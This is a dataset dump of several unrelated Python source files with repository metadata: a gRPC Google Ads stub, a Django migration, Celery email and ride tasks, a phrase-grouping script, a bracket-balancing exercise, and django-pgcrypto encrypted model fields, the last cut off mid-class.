    ----------
    mat_chanmap_dir : str
        Path to a ``.mat`` file containing ``'xcoords'`` and ``'ycoords'``
        column vectors.
    out_path : str
        Destination file for the converted map. Defaults to the original
        hard-coded ``'chanmap.npy'`` in the working directory, so existing
        callers are unaffected.

    Returns
    -------
    numpy.ndarray
        The stacked ``[x, y]`` coordinates that were saved.
    """
    mat_chanmap = loadmat(mat_chanmap_dir)
    x = mat_chanmap['xcoords']
    y = mat_chanmap['ycoords']
    # xcoords/ycoords come back as column vectors; hstack gives (n, 2).
    npy_chanmap = np.hstack([x, y])
    np.save(out_path, npy_chanmap)
    return npy_chanmap
def merge_filtered_files(filtered_location, output_directory, delete=True):
    """Concatenate per-chunk ``.npy`` files into one float32 binary recording.

    Files in ``filtered_location`` are appended in sorted (lexicographic)
    filename order to ``<output_directory>/standardized.bin``. Filenames
    containing ``'.ipynb'`` (notebook checkpoint artifacts) are skipped.

    Parameters
    ----------
    filtered_location : str
        Directory holding the intermediate ``.npy`` chunks.
    output_directory : str
        Destination directory for the merged binary file.
    delete : bool
        When True (default), each source chunk is removed after it has
        been appended.
    """
    filenames_sorted = sorted(os.listdir(filtered_location))
    f_out = os.path.join(output_directory, "standardized.bin")
    # 'with' guarantees the output handle is flushed and closed even if a
    # chunk fails to load (the original code leaked the handle).
    with open(f_out, 'wb') as f:
        for fname in filenames_sorted:
            if '.ipynb' in fname:
                continue
            path = os.path.join(filtered_location, fname)
            res = np.load(path).astype('float32')
            res.tofile(f)
            if delete:
                os.remove(path)
f5f389bfc7ade10eb551a3065beaed24b6f9f866 | 2,295 | py | Python | google/ads/google_ads/v4/proto/services/income_range_view_service_pb2_grpc.py | arammaliachi/google-ads-python | a4fe89567bd43eb784410523a6306b5d1dd9ee67 | [
"Apache-2.0"
] | 1 | 2021-04-09T04:28:47.000Z | 2021-04-09T04:28:47.000Z | google/ads/google_ads/v4/proto/services/income_range_view_service_pb2_grpc.py | arammaliachi/google-ads-python | a4fe89567bd43eb784410523a6306b5d1dd9ee67 | [
"Apache-2.0"
] | null | null | null | google/ads/google_ads/v4/proto/services/income_range_view_service_pb2_grpc.py | arammaliachi/google-ads-python | a4fe89567bd43eb784410523a6306b5d1dd9ee67 | [
"Apache-2.0"
] | null | null | null | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from google.ads.google_ads.v4.proto.resources import income_range_view_pb2 as google_dot_ads_dot_googleads__v4_dot_proto_dot_resources_dot_income__range__view__pb2
from google.ads.google_ads.v4.proto.services import income_range_view_service_pb2 as google_dot_ads_dot_googleads__v4_dot_proto_dot_services_dot_income__range__view__service__pb2
class IncomeRangeViewServiceStub(object):
"""Proto file describing the Income Range View service.
Service to manage income range views.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetIncomeRangeView = channel.unary_unary(
'/google.ads.googleads.v4.services.IncomeRangeViewService/GetIncomeRangeView',
request_serializer=google_dot_ads_dot_googleads__v4_dot_proto_dot_services_dot_income__range__view__service__pb2.GetIncomeRangeViewRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v4_dot_proto_dot_resources_dot_income__range__view__pb2.IncomeRangeView.FromString,
)
class IncomeRangeViewServiceServicer(object):
"""Proto file describing the Income Range View service.
Service to manage income range views.
"""
def GetIncomeRangeView(self, request, context):
"""Returns the requested income range view in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
| 44.134615 | 178 | 0.817865 | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from google.ads.google_ads.v4.proto.resources import income_range_view_pb2 as google_dot_ads_dot_googleads__v4_dot_proto_dot_resources_dot_income__range__view__pb2
from google.ads.google_ads.v4.proto.services import income_range_view_service_pb2 as google_dot_ads_dot_googleads__v4_dot_proto_dot_services_dot_income__range__view__service__pb2
class IncomeRangeViewServiceStub(object):
    """Proto file describing the Income Range View service.
    Service to manage income range views.
    """
    # NOTE: generated by the gRPC protoc plugin ("DO NOT EDIT" header above);
    # any manual changes here are lost on regeneration.
    def __init__(self, channel):
        """Constructor.
        Args:
            channel: A grpc.Channel.
        """
        # Unary-unary RPC: serializes GetIncomeRangeViewRequest on the way
        # out and deserializes the IncomeRangeView resource on the way back.
        self.GetIncomeRangeView = channel.unary_unary(
            '/google.ads.googleads.v4.services.IncomeRangeViewService/GetIncomeRangeView',
            request_serializer=google_dot_ads_dot_googleads__v4_dot_proto_dot_services_dot_income__range__view__service__pb2.GetIncomeRangeViewRequest.SerializeToString,
            response_deserializer=google_dot_ads_dot_googleads__v4_dot_proto_dot_resources_dot_income__range__view__pb2.IncomeRangeView.FromString,
        )
class IncomeRangeViewServiceServicer(object):
    """Proto file describing the Income Range View service.
    Service to manage income range views.
    """
    # NOTE: generated by the gRPC protoc plugin; concrete servicers subclass
    # this and override the RPC methods below.
    def GetIncomeRangeView(self, request, context):
        """Returns the requested income range view in full detail.
        """
        # Default abstract behavior: report UNIMPLEMENTED to the client and
        # raise locally so a missing override is never silently ignored.
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')
def add_IncomeRangeViewServiceServicer_to_server(servicer, server):
    """Register the servicer's RPC handlers on a ``grpc.Server``.

    Generated helper: wires ``GetIncomeRangeView`` to its request
    deserializer / response serializer and attaches the resulting generic
    handler under the fully qualified service name.
    """
    rpc_method_handlers = {
        'GetIncomeRangeView': grpc.unary_unary_rpc_method_handler(
            servicer.GetIncomeRangeView,
            request_deserializer=google_dot_ads_dot_googleads__v4_dot_proto_dot_services_dot_income__range__view__service__pb2.GetIncomeRangeViewRequest.FromString,
            response_serializer=google_dot_ads_dot_googleads__v4_dot_proto_dot_resources_dot_income__range__view__pb2.IncomeRangeView.SerializeToString,
        ),
    }
    generic_handler = grpc.method_handlers_generic_handler(
        'google.ads.googleads.v4.services.IncomeRangeViewService', rpc_method_handlers)
    server.add_generic_rpc_handlers((generic_handler,))
d4c77b1a26c287554651e6a15191ae129fda0e2d | 528 | py | Python | images/migrations/0004_auto_20160606_1603.py | OpenCanada/website | 6334ff412addc0562ac247080194e5d182e8e924 | [
"MIT"
] | 10 | 2015-12-18T16:41:33.000Z | 2018-11-11T08:36:46.000Z | images/migrations/0004_auto_20160606_1603.py | OpenCanada/website | 6334ff412addc0562ac247080194e5d182e8e924 | [
"MIT"
] | 96 | 2015-07-14T22:45:56.000Z | 2017-07-25T19:59:48.000Z | images/migrations/0004_auto_20160606_1603.py | OpenCanada/website | 6334ff412addc0562ac247080194e5d182e8e924 | [
"MIT"
] | 9 | 2015-07-28T14:38:43.000Z | 2019-01-04T17:38:42.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import wagtail.images.models
| 25.142857 | 137 | 0.666667 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import wagtail.images.models
class Migration(migrations.Migration):
    """Switch AttributedRendition.file to Wagtail's upload-path callable.

    Re-declares the ImageField so that ``upload_to`` uses
    ``wagtail.images.models.get_rendition_upload_to`` (a callable) instead
    of whatever the previous migration state recorded.
    """
    dependencies = [
        ('images', '0003_auto_20160405_1542'),
    ]
    operations = [
        migrations.AlterField(
            model_name='attributedrendition',
            name='file',
            field=models.ImageField(height_field='height', width_field='width', upload_to=wagtail.images.models.get_rendition_upload_to),
        ),
    ]
| 0 | 369 | 23 |
1ee85e632b42753a0f412f31534072b3a6255c3d | 1,851 | py | Python | make_phr2sg_id.py | Kyubyong/msg_reply | 046f6308785d8e65d7ae429964df40a001a9675d | [
"Apache-2.0"
] | 79 | 2019-05-21T06:41:46.000Z | 2021-08-06T13:07:38.000Z | make_phr2sg_id.py | abhijitdalavi/msg_reply | 046f6308785d8e65d7ae429964df40a001a9675d | [
"Apache-2.0"
] | 2 | 2019-05-28T19:28:24.000Z | 2020-04-07T01:17:45.000Z | make_phr2sg_id.py | abhijitdalavi/msg_reply | 046f6308785d8e65d7ae429964df40a001a9675d | [
"Apache-2.0"
] | 16 | 2019-05-27T06:10:38.000Z | 2020-10-21T06:19:21.000Z | '''
Make two dictionaries: phr2sg_id and sg_id2phr
phr2sg_id["nice work']==6152
phr2sg_id["nicely done']==6152
phr2sg_id["nice going']==6152
sg_id2phr[6152]=="Well done."
'''
import json, os
import operator
import pickle
from hparams import hp
import re
from tqdm import tqdm
if __name__ == "__main__":
print("Determine the most frequent Synonym Groups")
data = json.load(open(hp.sg))
sg_id2cnt = dict()
for sg_id, sg in tqdm(data.items()):
sg_id = int(sg_id)
phrs = sg["phrases"] # [['i am mormon', 1], ["i'm a mormon", 1]]
sg_cnt = 0 # total cnt
for phr, cnt in phrs:
if cnt >= hp.min_cnt:
sg_cnt += cnt
sg_id2cnt[sg_id] = sg_cnt
sg_id_cnt = sorted(sg_id2cnt.items(), key=operator.itemgetter(1), reverse=True)
sg_ids = [sg_id for sg_id, _ in sg_id_cnt][:hp.n_phrs]
print("Determine the group of phrases")
sg_id2phr = dict()
phr2sg_id, phr2cnt = dict(), dict()
for sg_id in tqdm(sg_ids):
sg = data[str(sg_id)]
phrs = sg["phrases"] # [['i am mormon', 1], ["i'm a mormon", 1]]
sg_id2phr[sg_id] = phrs[0][0]
for phr, cnt in phrs:
if cnt >= hp.min_cnt:
phr = refine(phr)
if phr in phr2cnt and cnt > phr2cnt[phr]: # overwrite
phr2cnt[phr] = cnt
phr2sg_id[phr] = sg_id
else:
phr2cnt[phr] = cnt
phr2sg_id[phr] = sg_id
print("save")
os.makedirs(os.path.dirname(hp.phr2sg_id), exist_ok=True)
os.makedirs(os.path.dirname(hp.sg_id2phr), exist_ok=True)
pickle.dump(phr2sg_id, open(hp.phr2sg_id, 'wb'))
pickle.dump(sg_id2phr, open(hp.sg_id2phr, 'wb')) | 29.380952 | 83 | 0.579687 | '''
Make two dictionaries: phr2sg_id and sg_id2phr
phr2sg_id["nice work']==6152
phr2sg_id["nicely done']==6152
phr2sg_id["nice going']==6152
sg_id2phr[6152]=="Well done."
'''
import json, os
import operator
import pickle
from hparams import hp
import re
from tqdm import tqdm
def refine(text):
    """Normalize a phrase: lowercase it and keep only ASCII letters and spaces."""
    lowered = text.lower()
    return re.sub(r"[^ A-Za-z]", "", lowered)
if __name__ == "__main__":
    print("Determine the most frequent Synonym Groups")
    # Load synonym groups; 'with' ensures the handle is closed (the original
    # left json/pickle file handles open).
    with open(hp.sg) as fin:
        data = json.load(fin)
    sg_id2cnt = dict()
    for sg_id, sg in tqdm(data.items()):
        sg_id = int(sg_id)
        phrs = sg["phrases"]  # e.g. [['i am mormon', 1], ["i'm a mormon", 1]]
        # Total count of sufficiently frequent phrasings in this group.
        sg_cnt = 0
        for phr, cnt in phrs:
            if cnt >= hp.min_cnt:
                sg_cnt += cnt
        sg_id2cnt[sg_id] = sg_cnt
    # Keep only the hp.n_phrs most frequent synonym groups.
    sg_id_cnt = sorted(sg_id2cnt.items(), key=operator.itemgetter(1), reverse=True)
    sg_ids = [sg_id for sg_id, _ in sg_id_cnt][:hp.n_phrs]

    print("Determine the group of phrases")
    sg_id2phr = dict()
    phr2sg_id, phr2cnt = dict(), dict()
    for sg_id in tqdm(sg_ids):
        sg = data[str(sg_id)]
        phrs = sg["phrases"]
        sg_id2phr[sg_id] = phrs[0][0]  # canonical phrase = first listed
        for phr, cnt in phrs:
            if cnt >= hp.min_cnt:
                phr = refine(phr)
                # BUGFIX: map each phrase to the group where it occurs with the
                # highest count. The original code's else-branch overwrote the
                # mapping unconditionally, making the count comparison a no-op.
                if phr not in phr2cnt or cnt > phr2cnt[phr]:
                    phr2cnt[phr] = cnt
                    phr2sg_id[phr] = sg_id

    print("save")
    os.makedirs(os.path.dirname(hp.phr2sg_id), exist_ok=True)
    os.makedirs(os.path.dirname(hp.sg_id2phr), exist_ok=True)
    with open(hp.phr2sg_id, 'wb') as fout:
        pickle.dump(phr2sg_id, fout)
    with open(hp.sg_id2phr, 'wb') as fout:
        pickle.dump(sg_id2phr, fout)
9ce2a8640535b80e39865e972b8191dfea0819ec | 3,922 | py | Python | cride/taskapp/tasks.py | jecs580/django_second_app | ef04b48342ef560eac8f58540ba684e5eb7d7926 | [
"MIT"
] | null | null | null | cride/taskapp/tasks.py | jecs580/django_second_app | ef04b48342ef560eac8f58540ba684e5eb7d7926 | [
"MIT"
] | 2 | 2019-12-24T00:03:49.000Z | 2019-12-24T00:03:50.000Z | cride/taskapp/tasks.py | jecs580/django_second_app | ef04b48342ef560eac8f58540ba684e5eb7d7926 | [
"MIT"
] | null | null | null | """Tareas de Celery."""
# Django
from django.conf import settings
from django.template.loader import render_to_string
from django.utils import timezone
from django.core.mail import EmailMultiAlternatives
# Utilities
import jwt
from datetime import timedelta
# Celery
from celery.decorators import task, periodic_task
# Models
from cride.users.models import User
from cride.rides.models import Ride
def gen_verification_token(user):
"""Crea un token JWT que el usuario pueda usar para verificar su cuenta"""
# El self se utiliza para que la funcion pueda usar los atributos de la clase.
exp_date = timezone.now()+timedelta(days=3)
payload = {
'user': user.username,
'exp': int(exp_date.timestamp()),
'type': 'email_confirmation' # Creamos una variable que especifique de que es el token, se lo usa
# cuando tu proyecto genera mas JWT en otras aplicaciones y no queremos que se confundan.
}
token = jwt.encode(payload, settings.SECRET_KEY, algorithm='HS256')
return token.decode() # regresamos el token en cadena
@task(name='send_confirmation_email', max_retries=3) # Especificamos que estas son tareas de celery.
# Este decorator recibira el nombre de la tarea, y la otra es el maximo numero de veces que intentara
# ejecutar la tarea en caso de que ocurra errores
def send_confirmation_email(user_pk): # Quitamos self del metodo por que ya no estan dentro de una clase,
# Cuando usamos celery en funciones es recomendado no enviar datos complejos como instancias de clases.
# Es mejor usar solo datos nativos como enteros, strings,etc.
"""Envia un enlace de verificación de cuenta a usuario dado
Enviando un email al usuario para verificar la cuenta
"""
user = User.objects.get(pk=user_pk) # Obtenemos el usuario por su pk
verification_token = gen_verification_token(user)
subject = 'Bienvenido @{}! Verifica tu cuenta para empezar a usar Comparte-Ride'.format(user.username)
from_email = 'Comparte Ride <noreply@comparteride.com>'
content = render_to_string(
'emails/users/account_verification.html',
{'token': verification_token, 'user': user}
) # Esta variable se usara en caso de que el usario no pueda interpretar el contenido html que se le
# envio, # El metodo render_to_string(), ayuda a no tener otra variable en caso de que no funcione el html
# html_content = '<p>This is an <strong>important</strong> message.</p>' # Esta variable era del
# contenido con html pero con la otra variable matamos 2 pajaros de un tiro.
msg = EmailMultiAlternatives(
subject,
content,
from_email,
[user.email] # Lista de direcciones de correos a enviar
) # El EmailMultiAlternative se utiliza para enviar emails que contengan un contenido de html,
msg.attach_alternative(
content, # En esta variable agregas la variable con el html pero enviamos content, que posee los 2.
"text/html")
msg.send()
# Usaremos los JWT para enviar la informacion del usuario sin necesidad de guardarlo en la base de datos.
@periodic_task(name='disable_finished_rides', run_every=timedelta(minutes=5))
# Esta tarea sera llamada cada 5 segundos
def disable_finished_rides():
"""Desactiva viajes terminados.
Este metodo servira para desactivar los rides una vez que termine
su hora de llegada, esto sera como un soporte para cuando el creador
del viaje se olvide desactivar el viaje.
"""
now = timezone.now()
offset = now + timedelta(seconds=5)
# Actualiza los paseos que ya han terminado // now <= arrival_date <= offset
rides = Ride.objects.filter(arrival_date__gte=now, is_active=True, arrival_date__lte=offset)
rides.update(is_active=False)
| 46.690476 | 114 | 0.703723 | """Tareas de Celery."""
# Django
from django.conf import settings
from django.template.loader import render_to_string
from django.utils import timezone
from django.core.mail import EmailMultiAlternatives
# Utilities
import jwt
from datetime import timedelta
# Celery
from celery.decorators import task, periodic_task
# Models
from cride.users.models import User
from cride.rides.models import Ride
def gen_verification_token(user):
    """Build a JWT the given user can use to verify their account (valid 3 days)."""
    expiration = timezone.now() + timedelta(days=3)
    payload = {
        'user': user.username,
        'exp': int(expiration.timestamp()),
        # Token type tag: distinguishes this JWT from tokens the project may
        # issue for other purposes, so they cannot be confused.
        'type': 'email_confirmation'
    }
    encoded = jwt.encode(payload, settings.SECRET_KEY, algorithm='HS256')
    # jwt.encode returns bytes here; hand back a plain string.
    return encoded.decode()
@task(name='send_confirmation_email', max_retries=3)  # Register as a Celery task.
# The decorator takes the task's name and the maximum number of retries
# should the task fail.
def send_confirmation_email(user_pk):  # Plain function, no self: Celery tasks
    # should be passed simple native values (ints, strings) rather than complex
    # objects such as model instances, hence only the user's pk.
    """Send an account-verification link to the given user.

    Renders the verification email and sends it (HTML plus a plain-text
    fallback) to the user's address.
    """
    user = User.objects.get(pk=user_pk)  # Look the user up by primary key.
    verification_token = gen_verification_token(user)
    subject = 'Bienvenido @{}! Verifica tu cuenta para empezar a usar Comparte-Ride'.format(user.username)
    from_email = 'Comparte Ride <noreply@comparteride.com>'
    content = render_to_string(
        'emails/users/account_verification.html',
        {'token': verification_token, 'user': user}
    )  # Rendered template; also serves as the plain-text body for clients
    # that cannot display HTML, so one variable covers both cases.
    msg = EmailMultiAlternatives(
        subject,
        content,
        from_email,
        [user.email]  # List of recipient addresses.
    )  # EmailMultiAlternatives supports attaching an HTML alternative body.
    msg.attach_alternative(
        content,  # The HTML version (same rendered template as above).
        "text/html")
    msg.send()
# JWTs carry the user's verification info so it never has to be stored in the
# database.
@periodic_task(name='disable_finished_rides', run_every=timedelta(minutes=5))
# Periodic task: Celery runs this every 5 minutes (run_every above; the
# original comment claiming "every 5 seconds" was wrong).
def disable_finished_rides():
    """Deactivate rides whose arrival time has passed.

    Safety net for ride owners who forget to deactivate their ride once it
    reaches its arrival time.
    """
    now = timezone.now()
    # NOTE(review): only a 5-second window ahead of `now` is scanned, yet the
    # task runs every 5 minutes — rides arriving between runs would never be
    # caught. Confirm whether this offset should match the run_every period.
    offset = now + timedelta(seconds=5)
    # Deactivate rides satisfying: now <= arrival_date <= offset
    rides = Ride.objects.filter(arrival_date__gte=now, is_active=True, arrival_date__lte=offset)
    rides.update(is_active=False)
| 0 | 0 | 0 |
0360fb911ea98bc93a9c5ce44d7d498eacc0e89d | 727 | py | Python | solutions/balanced-brackets/my_balanced_brackets.py | DuncanDHall/the-coding-interview | 701f8aacea34336e084bc978b974fb4816ffff85 | [
"MIT"
] | null | null | null | solutions/balanced-brackets/my_balanced_brackets.py | DuncanDHall/the-coding-interview | 701f8aacea34336e084bc978b974fb4816ffff85 | [
"MIT"
] | null | null | null | solutions/balanced-brackets/my_balanced_brackets.py | DuncanDHall/the-coding-interview | 701f8aacea34336e084bc978b974fb4816ffff85 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Balanced Brackets
#
# Write a function that accepts a string consisting entiring of brackets
# (`[](){}`) and returns whether it is balanced. Every "opening" bracket must
# be followed by a closing bracket of the same type. There can also be nested
# brackets, which adhere to the same rule.
#
# ```js
# f('()[]{}(([])){[()][]}') // true
# f('())[]{}') // false
# f('[(])') // false
# ```
pairs = {
"(": ")",
"[": "]",
"{": "}"
}
| 22.030303 | 78 | 0.500688 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Balanced Brackets
#
# Write a function that accepts a string consisting entiring of brackets
# (`[](){}`) and returns whether it is balanced. Every "opening" bracket must
# be followed by a closing bracket of the same type. There can also be nested
# brackets, which adhere to the same rule.
#
# ```js
# f('()[]{}(([])){[()][]}') // true
# f('())[]{}') // false
# f('[(])') // false
# ```
# Opening bracket -> its matching closing bracket.
pairs = {
    "(": ")",
    "[": "]",
    "{": "}"
}

def sol1(s):
    """Return True iff every bracket in ``s`` is properly matched and nested.

    ``s`` is assumed to consist entirely of the brackets ()[]{}. Uses a
    stack of pending openers; each closer must match the most recent opener.
    """
    stack = []
    for c in s:
        if c in pairs:  # opening bracket: remember it
            stack.append(c)
        elif not stack or c != pairs[stack.pop()]:
            # Closer with no opener, or mismatched pair.
            return False
    return not stack  # leftover openers mean unbalanced
| 201 | 0 | 23 |
5d186bbf0c94ad97c379b5beb8f402cd5fe1c4a8 | 9,689 | py | Python | pgcrypto/fields.py | fabiopintodacosta/django-pgcrypto | 02108795ec97f80af92ff6800a1c55eb958c3496 | [
"BSD-2-Clause"
] | null | null | null | pgcrypto/fields.py | fabiopintodacosta/django-pgcrypto | 02108795ec97f80af92ff6800a1c55eb958c3496 | [
"BSD-2-Clause"
] | null | null | null | pgcrypto/fields.py | fabiopintodacosta/django-pgcrypto | 02108795ec97f80af92ff6800a1c55eb958c3496 | [
"BSD-2-Clause"
] | null | null | null | from django import forms
from django.conf import settings
from django.core import validators
from django.db import models
from django.utils import six, timezone
from django.utils.encoding import force_text
from django.utils.translation import ugettext_lazy as _
import django
from .base import aes_pad_key, armor, dearmor, pad, unpad
import datetime
import decimal
if django.VERSION >= (1, 7):
from django.db.models.lookups import Lookup
for lookup_name in ('exact', 'gt', 'gte', 'lt', 'lte'):
class_name = 'EncryptedLookup_%s' % lookup_name
lookup_class = type(class_name, (EncryptedLookup,), {'lookup_name': lookup_name})
BaseEncryptedField.register_lookup(lookup_class)
| 39.386179 | 119 | 0.655898 | from django import forms
from django.conf import settings
from django.core import validators
from django.db import models
from django.utils import six, timezone
from django.utils.encoding import force_text
from django.utils.translation import ugettext_lazy as _
import django
from .base import aes_pad_key, armor, dearmor, pad, unpad
import datetime
import decimal
class BaseEncryptedField (models.Field):
    """Model field stored encrypted and ASCII-armored in a Postgres text column.

    Encryption uses pycrypto (AES or Blowfish) in CBC mode with a zeroed IV so
    stored values stay compatible with pgcrypto's encrypt()/decrypt() on the
    database side. Subclasses set ``field_cast`` so SQL lookups can cast the
    decrypted text back to the proper type.
    """
    # SQL cast appended to the decrypted text in lookups; subclasses override
    # (e.g. '::integer', '::numeric').
    field_cast = ''
    def __init__(self, *args, **kwargs):
        # Pop the pgcrypto-specific options (cipher, key, charset, check_armor,
        # versioned) before delegating the rest to models.Field.
        # Just in case pgcrypto and/or pycrypto support more than AES/Blowfish.
        valid_ciphers = getattr(settings, 'PGCRYPTO_VALID_CIPHERS', ('AES', 'Blowfish'))
        self.cipher_name = kwargs.pop('cipher', getattr(settings, 'PGCRYPTO_DEFAULT_CIPHER', 'AES'))
        assert self.cipher_name in valid_ciphers
        self.cipher_key = kwargs.pop('key', getattr(settings, 'PGCRYPTO_DEFAULT_KEY', ''))
        self.charset = kwargs.pop('charset', 'utf-8')
        if self.cipher_name == 'AES':
            # AES keys must be bytes of a valid AES key length; pad if needed.
            if isinstance(self.cipher_key, six.text_type):
                self.cipher_key = self.cipher_key.encode(self.charset)
            self.cipher_key = aes_pad_key(self.cipher_key)
        # Resolve e.g. Crypto.Cipher.AES dynamically from the cipher name.
        mod = __import__('Crypto.Cipher', globals(), locals(), [self.cipher_name], 0)
        self.cipher_class = getattr(mod, self.cipher_name)
        self.check_armor = kwargs.pop('check_armor', True)
        self.versioned = kwargs.pop('versioned', False)
        super(BaseEncryptedField, self).__init__(*args, **kwargs)
    def get_internal_type(self):
        # Stored as TEXT regardless of the python-side type.
        return 'TextField'
    def south_field_triple(self):
        """
        Describe the field to south for use in migrations.
        """
        from south.modelsinspector import introspector
        args, kwargs = introspector(self)
        return "django.db.models.fields.TextField", args, kwargs
    def deconstruct(self):
        """
        Deconstruct the field for Django 1.7+ migrations.
        """
        name, path, args, kwargs = super(BaseEncryptedField, self).deconstruct()
        kwargs.update({
            # NOTE(review): 'key' is left out of the deconstruction —
            # presumably to keep the secret out of migration files; confirm.
            #'key': self.cipher_key,
            'cipher': self.cipher_name,
            'charset': self.charset,
            'check_armor': self.check_armor,
            'versioned': self.versioned,
        })
        return name, path, args, kwargs
    def get_cipher(self):
        """
        Return a new Cipher object for each time we want to encrypt/decrypt. This is because
        pgcrypto expects a zeroed block for IV (initial value), but the IV on the cipher
        object is cumulatively updated each time encrypt/decrypt is called.
        """
        return self.cipher_class.new(self.cipher_key, self.cipher_class.MODE_CBC, b'\0' * self.cipher_class.block_size)
    def is_encrypted(self, value):
        """
        Returns whether the given value is encrypted (and armored) or not.
        """
        return isinstance(value, six.string_types) and value.startswith('-----BEGIN')
    def to_python(self, value):
        # Decrypt armored database values; pass everything else through.
        if self.is_encrypted(value):
            # If we have an encrypted (armored, really) value, do the following when accessing it as a python value:
            #    1. De-armor the value to get an encrypted bytestring.
            #    2. Decrypt the bytestring using the specified cipher.
            #    3. Unpad the bytestring using the cipher's block size.
            #    4. Decode the bytestring to a unicode string using the specified charset.
            return unpad(self.get_cipher().decrypt(dearmor(value, verify=self.check_armor)),
                self.cipher_class.block_size).decode(self.charset)
        return value
    def from_db_value(self, value, expression, connection, context):
        # Django calls this when loading from the database; reuse to_python.
        return self.to_python(value)
    def get_db_prep_save(self, value, connection):
        # Encrypt plaintext values on the way to the database; values that are
        # already armored are stored as-is.
        if value and not self.is_encrypted(value):
            # If we have a value and it's not encrypted, do the following before storing in the database:
            #    1. Convert it to a unicode string (by calling unicode).
            #    2. Encode the unicode string according to the specified charset.
            #    3. Pad the bytestring for encryption, using the cipher's block size.
            #    4. Encrypt the padded bytestring using the specified cipher.
            #    5. Armor the encrypted bytestring for storage in the text field.
            return armor(self.get_cipher().encrypt(pad(force_text(value).encode(self.charset),
                self.cipher_class.block_size)), versioned=self.versioned)
        return value
class EncryptedTextField (BaseEncryptedField):
    """Encrypted counterpart of a text field; renders as a textarea."""
    description = _('Text')

    def formfield(self, **kwargs):
        """Build the form field, defaulting the widget to a Textarea."""
        options = dict({'widget': forms.Textarea}, **kwargs)
        return super(EncryptedTextField, self).formfield(**options)
class EncryptedCharField (BaseEncryptedField):
    """Encrypted counterpart of a CharField.

    ``max_length`` is accepted for API compatibility with CharField but
    deliberately discarded: the armored ciphertext is much longer than the
    plaintext, so no length limit is enforced.
    """
    description = _('String')

    def __init__(self, *args, **kwargs):
        kwargs.pop('max_length', None)  # accept and drop (see class docstring)
        super(EncryptedCharField, self).__init__(*args, **kwargs)

    def formfield(self, **kwargs):
        """Build the form field, defaulting the widget to a TextInput."""
        options = dict({'widget': forms.TextInput}, **kwargs)
        return super(EncryptedCharField, self).formfield(**options)
class EncryptedIntegerField (BaseEncryptedField):
    """Encrypted counterpart of an IntegerField; lookups cast with '::integer'."""
    description = _('Integer')
    field_cast = '::integer'

    def formfield(self, **kwargs):
        """Build the form field, defaulting to forms.IntegerField."""
        options = dict({'form_class': forms.IntegerField}, **kwargs)
        return super(EncryptedIntegerField, self).formfield(**options)

    def to_python(self, value):
        """Decrypt (via the base class) and coerce truthy values to int."""
        if not value:
            # Preserve falsy inputs (None, '') untouched.
            return value
        return int(super(EncryptedIntegerField, self).to_python(value))
class EncryptedDecimalField (BaseEncryptedField):
    """Encrypted counterpart of a DecimalField; lookups cast with '::numeric'."""
    description = _('Decimal number')
    field_cast = '::numeric'

    def formfield(self, **kwargs):
        """Build the form field, defaulting to forms.DecimalField."""
        options = dict({'form_class': forms.DecimalField}, **kwargs)
        return super(EncryptedDecimalField, self).formfield(**options)

    def to_python(self, value):
        """Decrypt (via the base class) and coerce truthy values to Decimal."""
        if not value:
            # Preserve falsy inputs (None, '') untouched.
            return value
        return decimal.Decimal(super(EncryptedDecimalField, self).to_python(value))
class EncryptedDateField (BaseEncryptedField):
    """Encrypted counterpart of a DateField, including auto_now/auto_now_add."""
    description = _('Date (without time)')
    field_cast = '::date'
    def __init__(self, verbose_name=None, name=None, auto_now=False, auto_now_add=False, **kwargs):
        # Mirror DateField's auto_now/auto_now_add options.
        self.auto_now, self.auto_now_add = auto_now, auto_now_add
        if auto_now or auto_now_add:
            # Auto-populated fields must not be editable via forms/admin.
            kwargs['editable'] = False
            kwargs['blank'] = True
        super(EncryptedDateField, self).__init__(verbose_name, name, **kwargs)
    def formfield(self, **kwargs):
        # Default the form widget to a DateInput.
        defaults = {'widget': forms.DateInput}
        defaults.update(kwargs)
        return super(EncryptedDateField, self).formfield(**defaults)
    def to_python(self, value):
        # Decrypt via the base class, then parse into a date object.
        if value in self.empty_values:
            return None
        unencrypted_value = super(EncryptedDateField, self).to_python(value)
        return self._parse_value(unencrypted_value)
    def value_to_string(self, obj):
        # NOTE(review): _get_val_from_obj was removed in Django 2.0; this code
        # appears to target older Django versions — confirm before upgrading.
        val = self._get_val_from_obj(obj)
        return '' if val is None else val.isoformat()
    def pre_save(self, model_instance, add):
        # Inject the auto_now/auto_now_add value just before saving.
        if self.auto_now or (self.auto_now_add and add):
            value = self._get_auto_now_value()
            setattr(model_instance, self.attname, value)
            return value
        else:
            return super(EncryptedDateField, self).pre_save(model_instance, add)
    def _parse_value(self, value):
        # Delegate parsing to a throwaway DateField; subclasses override.
        return models.DateField().to_python(value)
    def _get_auto_now_value(self):
        # "Now" for auto_now/auto_now_add; EncryptedDateTimeField overrides
        # this to return an aware datetime.
        return datetime.date.today()
class EncryptedDateTimeField (EncryptedDateField):
    """Encrypted counterpart of a DateTimeField."""
    description = _('Date (with time)')
    field_cast = 'timestamp with time zone'

    def formfield(self, **kwargs):
        """Build the form field, defaulting the widget to a DateTimeInput."""
        options = dict({'widget': forms.DateTimeInput}, **kwargs)
        return super(EncryptedDateTimeField, self).formfield(**options)

    def _parse_value(self, value):
        # Parse with a throwaway DateTimeField rather than a DateField.
        return models.DateTimeField().to_python(value)

    def _get_auto_now_value(self):
        # Timezone-aware "now" for auto_now/auto_now_add.
        return timezone.now()
class EncryptedEmailField (BaseEncryptedField):
    """Encrypted counterpart of an EmailField (validates addresses on input)."""
    default_validators = [validators.validate_email]
    description = _('Email address')

    def formfield(self, **kwargs):
        """Build the form field, defaulting to forms.EmailField."""
        options = dict({'form_class': forms.EmailField}, **kwargs)
        return super(EncryptedEmailField, self).formfield(**options)
if django.VERSION >= (1, 7):
    from django.db.models.lookups import Lookup

    class EncryptedLookup (Lookup):
